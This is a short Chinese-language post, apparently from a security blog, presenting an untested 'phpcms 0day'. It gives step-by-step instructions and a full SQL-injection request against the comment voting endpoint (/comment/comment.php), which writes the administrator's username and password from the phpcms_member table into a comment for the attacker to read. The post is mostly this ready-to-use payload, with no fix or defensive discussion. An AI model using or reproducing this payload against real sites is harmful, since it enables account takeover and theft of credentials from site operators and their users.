首页
    当前位置:
    首页 > 漏洞 > phpcms 0day

    phpcms 0day

    漏洞 10-31 990 0

    1、找到任意一篇文章发表评论并得到评论ID

    2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID

    3、重新查看评论

    TXT留在桌面N久了 一直没测试 就甩出来吧 可能市面上已有,所以请不要JJYY

    标签:

    phpcms 0day:等您坐沙发呢!

    发表评论

    表情
    还能输入210个字